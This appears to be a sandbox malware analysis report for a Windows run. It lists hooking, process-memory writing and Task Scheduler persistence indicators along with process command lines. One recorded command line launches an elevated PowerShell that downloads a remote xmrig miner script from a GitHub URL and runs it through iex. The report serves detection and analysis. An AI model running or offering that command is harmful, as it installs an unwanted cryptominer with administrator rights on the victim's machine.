N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Greenshot\Greenshot.exe N/A
N/A N/A C:\Program Files\Greenshot\Greenshot.exe N/A
N/A N/A C:\Program Files\Greenshot\Greenshot.exe N/A
N/A N/A C:\Program Files\Greenshot\Greenshot.exe N/A
N/A N/A C:\Program Files\Greenshot\Greenshot.exe N/A
N/A N/A C:\Program Files\Greenshot\Greenshot.exe N/A
N/A N/A C:\Program Files\Greenshot\Greenshot.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Program Files\Greenshot\Greenshot.exe N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Windows\system32\SystemSettingsAdminFlows.exe N/A
N/A N/A C:\Windows\System32\PickerHost.exe N/A
N/A N/A C:\Windows\System32\PickerHost.exe N/A
N/A N/A C:\Windows\System32\PickerHost.exe N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3676 wrote to memory of 4616 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4616 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 1020 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 1020 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3676 wrote to memory of 4280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa741d3cb8,0x7ffa741d3cc8,0x7ffa741d3cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2024 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3788 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService

C:\Windows\System32\DataExchangeHost.exe

C:\Windows\System32\DataExchangeHost.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13

C:\Windows\system32\control.exe

"C:\Windows\system32\control.exe" /name Microsoft.AdministrativeTools

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding

C:\Windows\system32\control.exe

"C:\Windows\system32\control.exe" /name Microsoft.AdministrativeTools

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}

C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE

"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa741d3cb8,0x7ffa741d3cc8,0x7ffa741d3cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1880 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2544 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

